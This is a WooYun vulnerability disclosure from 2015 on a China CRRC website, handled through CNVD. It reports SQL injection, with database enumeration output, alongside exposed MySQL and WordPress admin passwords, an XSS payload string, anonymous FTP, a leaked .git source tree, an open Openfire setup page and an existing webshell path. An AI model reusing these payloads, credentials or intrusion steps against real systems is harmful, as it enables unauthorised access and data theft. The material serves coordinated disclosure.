当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0143510

漏洞标题:中国中车某站注入漏洞泄漏整站数据库及网站源码GETSHELL漏洞打包

相关厂商:chinacnr.com

漏洞作者: 路人甲

提交时间:2015-09-26 00:59

修复时间:2015-11-14 09:30

公开时间:2015-11-14 09:30

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-09-26: 细节已通知厂商并且等待厂商处理中
2015-09-30: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开
2015-10-10: 细节向核心白帽子及相关领域专家公开
2015-10-20: 细节向普通白帽子公开
2015-10-30: 细节向实习白帽子公开
2015-11-14: 细节向公众公开

简要描述:

由中国南车股份有限公司与中国北车股份有限公司合并成立的中国中车股份有限公司,已于2015年
6月1日注册成立,并于6月8日在沪港两地上市交易。
漏洞类型包括:
1.SQL注入
2.MYSQL3306数据外连
3.WORDPRESS 后台登录
4.XSS
5.FTP匿名
6.GIT信息泄漏致源码打包
7.openfire安装
8.getshell

详细说明:

0x00问题站点
http://**.**.**.**/c/ca/travel
0x01SQL注入,root权限
http://**.**.**.**/c/ca/mall/mall-search?page=1&sCat=1

sql1.gif


sql2.jpg


available databases [11]:
[*] exhibition
[*] gaotie_server_production
[*] information_schema
[*] multimedia
[*] mysql
[*] openfire
[*] smartstream
[*] smartvideo2.0
[*] test
[*] wifiuser
[*] wordpress


back-end DBMS: MySQL 5.0
Database: multimedia
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| dish                                  | 253     |
| `call`                                | 51      |
| admin                                 | 1       |
+---------------------------------------+---------+
Database: wifiuser
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| verification                          | 28      |
| `user`                                | 1       |
+---------------------------------------+---------+
Database: smartstream
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| t_app_inject                          | 410     |
+---------------------------------------+---------+
Database: gaotie_server_production
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| investigations                        | 513     |
| ordernumber_dinnernumbers             | 425     |
| dinner_orders                         | 370     |
| services                              | 72      |
| users                                 | 50      |
| phone_verifications                   | 34      |
| media_infos                           | 30      |
| schema_migrations                     | 25      |
| dinner_lists                          | 16      |
| version_infos                         | 13      |
| games                                 | 7       |
| video_urls                            | 1       |
+---------------------------------------+---------+
Database: mysql
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| help_relation                         | 1009    |
| help_topic                            | 510     |
| help_keyword                          | 453     |
| help_category                         | 40      |
| `user`                                | 9       |
| db                                    | 5       |
| aavpxl                                | 2       |
| aokeqh                                | 2       |
| dsdbxv                                | 2       |
| fqgqxn                                | 2       |
| hgrtcv                                | 2       |
| jfvdcq                                | 2       |
| jgdpkq                                | 2       |
| jivobb                                | 2       |
| ldqjya                                | 2       |
| lgmekb                                | 2       |
| llextr                                | 2       |
| lxbois                                | 2       |
| nhihiw                                | 2       |
| ogjcrw                                | 2       |
| pkjrzz                                | 2       |
| rzeusc                                | 2       |
| siijdo                                | 2       |
| speuqu                                | 2       |
| sviewt                                | 2       |
| tcfgbd                                | 2       |
| uisqxf                                | 2       |
| uzlehr                                | 2       |
| wqdfwa                                | 2       |
| xzcjbi                                | 2       |
| zdnvhg                                | 2       |
| zmzxdy                                | 2       |
| zzbhcj                                | 2       |
| abcgv                                 | 1       |
| abcgvmo                               | 1       |
| dvjeuh                                | 1       |
| hgonvs                                | 1       |
| hmlrty                                | 1       |
| jkwxyx32                              | 1       |
| john                                  | 1       |
| john1                                 | 1       |
| john2                                 | 1       |
| john3                                 | 1       |
| llbarm                                | 1       |
| lmwazy                                | 1       |
| lydsaj                                | 1       |
| nhrazr                                | 1       |
| tempEx                                | 1       |
| tempExT                               | 1       |
| tempExT1                              | 1       |
| tempMix1                              | 1       |
| tirnal32                              | 1       |
| wacnnl32                              | 1       |
| xblvrb                                | 1       |
| xhctwk                                | 1       |
| xkyzvl                                | 1       |
+---------------------------------------+---------+
Database: wordpress
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| wp_postmeta                           | 1459    |
| wp_posts                              | 883     |
| wp_term_relationships                 | 324     |
| wp_options                            | 187     |
| wp_term_taxonomy                      | 82      |
| wp_terms                              | 82      |
| wp_stl_timeline_terms                 | 80      |
| wp_comments                           | 73      |
| wp_usermeta                           | 24      |
| wp_stl_timeline_bands                 | 2       |
| wp_users                              | 1       |
+---------------------------------------+---------+
Database: exhibition
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| wp_postmeta                           | 2256    |
| wp_posts                              | 1406    |
| wp_options                            | 201     |
| wp_term_taxonomy                      | 81      |
| wp_terms                              | 81      |
| wp_usermeta                           | 34      |
| wp_comments                           | 5       |
| wp_users                              | 2       |
+---------------------------------------+---------+
Database: smartvideo2.0
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| PLAYRECORDPO                          | 2867    |
| SINGLEFILECONTENTPO                   | 379     |
| PICCONTENTPO                          | 183     |
| ASSETPO                               | 180     |
| SYSTEMCONFIGPO                        | 62      |
| RES_ID                                | 47      |
| MENUMANAGEPO                          | 27      |
| SCHEDULEPO                            | 17      |
| INFOPUBPOSITIONPO                     | 16      |
| ADMINRECOMMENTPO                      | 15      |
| TEXT_SCHEDULE                         | 15      |
| PREPARECHANNELPO                      | 12      |
| COLUMNPO                              | 11      |
| TERMINALINFOPO                        | 11      |
| ASSETPACKAGEPO                        | 8       |
| CHANNELPO                             | 8       |
| SINGLESTREAMCONTENTPO                 | 8       |
| INFOPUBTEMPLETPO                      | 6       |
| ADVERTPOSITIONPO                      | 3       |
| ADVERTMAPPO                           | 2       |
| ADVERTPO                              | 2       |
| USERPO                                | 2       |
| ADMINUSERPO                           | 1       |
| ASSET_SCHEDULE                        | 1       |
| TERMINALGROUPPO                       | 1       |
| TEXTCONTENTPO                         | 1       |
+---------------------------------------+---------+
Database: openfire
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| ofOffline                             | 124     |
| ofUser                                | 24      |
| ofPresence                            | 22      |
| ofProperty                            | 13      |
| ofSecurityAuditLog                    | 11      |
| ofID                                  | 5       |
| ofPubsubDefaultConf                   | 2       |
| ofMucService                          | 1       |
| ofPubsubAffiliation                   | 1       |
| ofPubsubNode                          | 1       |
| ofVersion                             | 1       |
+---------------------------------------+---------+
Database: information_schema
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| STATISTICS                            | 338     |
| GLOBAL_STATUS                         | 291     |
| SESSION_STATUS                        | 291     |
| GLOBAL_VARIABLES                      | 277     |
| SESSION_VARIABLES                     | 277     |
| TABLES                                | 227     |
| KEY_COLUMN_USAGE                      | 215     |
| TABLE_CONSTRAINTS                     | 156     |
| USER_PRIVILEGES                       | 139     |
| COLLATION_CHARACTER_SET_APPLICABILITY | 130     |
| COLLATIONS                            | 129     |
| SCHEMA_PRIVILEGES                     | 68      |
| CHARACTER_SETS                        | 36      |
| SCHEMATA                              | 11      |
| ENGINES                               | 5       |
+---------------------------------------+---------+


0x02 mysql 数据库连接,可以直接打包所有库下载
通过--password
可以找到一个mysql帐号口令 r00t **.**.**.**

1.gif


2.gif


0x03 wordpress后台登录
http://**.**.**.**/wp-login.php
admin hello

aaa.jpg


0x04 XSS
http://**.**.**.**/c/ca/travel/travel-timetable
from=1'%22()%26%25<woo><ScRiPt%20>prompt(yun)</ScRiPt>&to=1

bbb.png


0x05FTP匿名登录

ccc.png


0x06GIT信息泄漏源码打包

git.gif


神器GitHack.py
http://**.**.**.**/.git/

abc.png


0x07openfire安装
**.**.**.**:9090/setup/index.jsp

fire.gif


0x08shell 一枚
http://**.**.**.**/.git/mod_xsystem.php

a.gif


漏洞证明:

aaa.jpg


a.gif


修复方案:

删马
过滤
安全配置

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2015-09-30 09:29

厂商回复:


CNVD确认所述情况,已由CNVD通过网站管理方公开联系渠道向其邮件通报,由其后续提供解决方案

最新状态:

暂无